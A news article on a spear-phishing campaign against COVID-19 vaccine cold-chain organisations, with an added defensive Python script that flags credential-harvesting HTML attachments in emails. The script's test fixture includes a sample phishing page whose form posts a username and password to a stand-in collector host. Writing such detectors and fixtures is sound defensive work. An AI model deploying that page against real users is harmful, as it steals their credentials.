Researchers have discovered a global spear-phishing campaign that has targeted organizations associated with the distribution of COVID-19 vaccines since September 2020.
According to IBM Security X-Force researchers, the campaign has been attributed to a nation-state actor. They claimed that the attacks took aim at the vaccine cold chain, companies responsible for storing and delivering the COVID-19 vaccine at safe temperatures.
The US Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert, urging Operation Warp Speed (OWS) organizations and companies involved in vaccine storage and transport to review the indicators of compromise (IoCs) and increase their defenses.
It is not known, however, whether any of the phishing attempts were successful. IBM has notified the appropriate entities and authorities about this targeted attack.
The phishing emails, dating back to September, have targeted organizations in Italy, Germany, South Korea, the Czech Republic, greater Europe, and Taiwan, including the European Commission’s Directorate-General for Taxation and Customs Union, unnamed solar panel manufacturers, a South Korean software development firm, and a German website development company.
The attacks targeted organizations linked to the Gavi vaccine alliance in order to collect user credentials to gain future unauthorized access to corporate networks and sensitive information relating to the COVID-19 vaccine distribution.
The threat actors behind the operation used specially crafted emails that pretended to be requests for quotations for participation in a vaccine program. They also masqueraded as a business executive from Haier Biomedical, a legitimate China-based cold chain provider, so that recipients would open the inbound emails without doubting the sender’s authenticity.
IBM researchers Claire Zaboeva and Melissa Frydrych said that the emails contain malicious HTML attachments that open locally, prompting recipients to enter their credentials to view the file.
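The lure described above, an HTML attachment that renders locally and asks the reader for credentials, is a pattern a mail gateway or SOC can screen for before the message reaches a mailbox. The following Python script is an added example, not code from IBM X-Force, CISA, or this article: it parses a constructed sample email and, for every HTML attachment, reports password fields, forms posting to external URLs, and script tags. The sender and recipient addresses, filenames, and HTML content are placeholders constructed for the example.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message (hypothetical addresses and content) with an HTML
# attachment that mimics a "view the document" page asking for credentials.
SAMPLE_EML = """\
From: quotes@example-supplier.invalid
To: procurement@example-pharma.invalid
Subject: Request for quotation - cold chain equipment
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/plain; charset="utf-8"

Please open the attached file to view our request for quotation.

--BOUNDARY
Content-Type: text/html; name="RFQ_Details.html"
Content-Disposition: attachment; filename="RFQ_Details.html"
Content-Transfer-Encoding: 7bit

<html><body>
<p>Enter your email password to view the document.</p>
<form method="post" action="https://collector.example.invalid/submit">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="submit" value="View">
</form>
</body></html>
--BOUNDARY--
"""

# Constructed benign message with no attachments, for comparison.
BENIGN_EML = """\
From: colleague@example-pharma.invalid
To: procurement@example-pharma.invalid
Subject: Meeting notes
Content-Type: text/plain; charset="utf-8"

Notes from today's call are in the shared folder.
"""


class CredentialFormScanner(HTMLParser):
    """Collects form targets, password inputs and script tags from an HTML document."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.password_inputs = 0
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        attributes = dict(attrs)
        if tag == "form":
            self.form_actions.append(attributes.get("action") or "")
        elif tag == "input" and (attributes.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "script":
            self.script_tags += 1


def scan_message(raw_message):
    """Return one finding per HTML attachment in an RFC 822 message string."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        filename = part.get_filename() or ""
        is_html = part.get_content_type() == "text/html" or filename.lower().endswith((".html", ".htm"))
        if not is_html:
            continue
        charset = part.get_content_charset() or "utf-8"
        html = part.get_payload(decode=True).decode(charset, errors="replace")
        scanner = CredentialFormScanner()
        scanner.feed(html)
        # Absolute http(s) form targets mean the page will ship typed input off the host.
        external_targets = [u for u in scanner.form_actions if urlparse(u).scheme in ("http", "https")]
        findings.append({
            "filename": filename,
            "password_fields": scanner.password_inputs,
            "external_form_targets": external_targets,
            "script_tags": scanner.script_tags,
            # A password prompt inside a standalone HTML attachment is the core indicator.
            "suspicious": scanner.password_inputs > 0,
        })
    return findings


if __name__ == "__main__":
    for finding in scan_message(SAMPLE_EML):
        print(finding)
    print("benign message findings:", scan_message(BENIGN_EML))
```

The script relies only on the standard library, so it can run inside a mail-flow hook or over a directory of quarantined `.eml` files. Obfuscated lures that assemble the form from JavaScript will show zero password fields but a non-zero script count, which is why that count is reported alongside the form data rather than folded into the verdict.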
The identities of the operators are still unknown, but their main aim is believed to be gathering usernames and passwords and abusing them to steal intellectual property and move laterally across victim environments to conduct espionage campaigns.
COVID-19 vaccine research and development has been a target of sustained cyberattacks since the start of the year.
Image credits: India Today